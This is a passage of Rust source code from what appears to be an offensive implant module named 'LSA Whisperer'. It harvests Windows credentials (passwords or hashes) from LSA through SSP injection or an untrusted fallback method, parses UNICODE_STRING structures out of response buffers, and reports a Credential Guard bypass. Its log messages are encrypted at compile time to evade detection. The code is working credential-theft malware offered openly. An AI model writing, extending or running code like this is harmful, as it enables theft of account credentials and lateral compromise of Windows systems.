                            },
                        };
                        credentials.push(cred);
                        found_creds += 1;
                    }
                }
            }
        }

        offset += 16; // Advance to next potential UNICODE_STRING
    }
}

/// Read a UNICODE_STRING at the given offset within a response buffer.
fn read_unicode_string_at(resp: &[u8], offset: usize) -> Option<String> {
    if offset + 16 > resp.len() {
        return None;
    }

    let length = u16::from_le_bytes(resp[offset..offset + 2].try_into().ok()?) as usize;
    let max_length = u16::from_le_bytes(resp[offset + 2..offset + 4].try_into().ok()?) as usize;

    if length == 0 || length > max_length || length % 2 != 0 || length > 512 {
        return None;
    }

    let buf_ptr = usize::from_le_bytes(resp[offset + 8..offset + 16].try_into().ok()?);

    if buf_ptr < resp.as_ptr() as usize {
        return None;
    }
    let in_buf_offset = buf_ptr - resp.as_ptr() as usize;
    if in_buf_offset + length > resp.len() {
        return None;
    }

    let wide_bytes: Vec<u16> = (0..length / 2)
        .map(|j| {
            let off = in_buf_offset + j * 2;
            u16::from_le_bytes(resp[off..off + 2].try_into().unwrap_or([0; 2]))
        })
        .collect();

    Some(String::from_utf16_lossy(&wide_bytes))
}

// ── Public API ─────────────────────────────────────────────────────────────

/// Harvest credentials from LSA using the specified method.
///
/// Returns a JSON-encoded credential list compatible with the `HarvestLSASS`
/// result format for consistency.
pub fn harvest_lsa(method: &common::LsaMethod, timeout_secs: u64) -> Result<String> {
    // Reset cancellation flag.
    CANCELLED.store(false, Ordering::Relaxed);

    let credentials = match method {
        common::LsaMethod::Untrusted => harvest_untrusted(timeout_secs)?,
        common::LsaMethod::SspInject => harvest_ssp_inject(timeout_secs)?,
        common::LsaMethod::Auto => {
            // Try SSP injection first (requires admin); fall back to untrusted.
            match harvest_ssp_inject(timeout_secs) {
                Ok(creds) if !creds.is_empty() => creds,
                Ok(_) => {
                    log::info!(
                        "{}",
                        String::from_utf8_lossy(&string_crypt::enc_str!(
                            "LSA Whisperer: SSP injection returned empty, trying untrusted"
                        ))
                        .trim_end_matches('\0')
                    );
                    harvest_untrusted(timeout_secs)?
                }
                Err(_) => harvest_untrusted(timeout_secs)?,
            }
        }
    };

    CRED_COUNT.fetch_add(credentials.len(), Ordering::Relaxed);

    // Serialize in the same format as lsass_harvest::HarvestResult.
    let result = serde_json::json!({
        "credentials": credentials,
        "method": match method {
            common::LsaMethod::Untrusted => "untrusted",
            common::LsaMethod::SspInject => "ssp_inject",
            common::LsaMethod::Auto => "auto",
        },
        "credential_guard_bypass": true,
    });

    serde_json::to_string(&result).context("failed to serialize LSA harvest result")
}

/// Return the current status of the LSA Whisperer subsystem.
pub fn whisperer_status() -> Result<String> {
    let status = WhispererStatus {
        active_method: if SSP_INJECTED.load(Ordering::Relaxed) {
            Some(String::from_utf8_lossy(&string_crypt::enc_str!("ssp_inject"))
                .trim_end_matches('\0')
                .to_string())
        } else {
            None
        },
        credentials_captured: CRED_COUNT.load(Ordering::Relaxed),
        ssp_injected: SSP_INJECTED.load(Ordering::Relaxed),
        lsa_connected: false, // Connections are ephemeral per-harvest
    };

    serde_json::to_string(&status).context("failed to serialize LSA Whisperer status")
}

/// Stop the LSA Whisperer: cancel any in-progress operation, clear the buffer.
pub fn whisperer_stop() -> Result<String> {
    CANCELLED.store(true, Ordering::Relaxed);

    // Clear the credential buffer.
    {
        let mut buf = CREDENTIAL_BUFFER.lock().unwrap();
        for cred in buf.iter_mut() {
            let mut pw_bytes = std::mem::take(&mut cred.password_or_hash).into_bytes();
            secure_zero(&mut pw_bytes);
        }
        buf.clear();
    }

    SSP_INJECTED.store(false, Ordering::Relaxed);
    CRED_COUNT.store(0, Ordering::Relaxed);

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: stopped, buffer cleared"
        ))
        .trim_end_matches('\0')
    );

    Ok(String::from_utf8_lossy(&string_crypt::enc_str!("LSA Whisperer stopped"))
        .trim_end_matches('\0')
        .to_string())
}
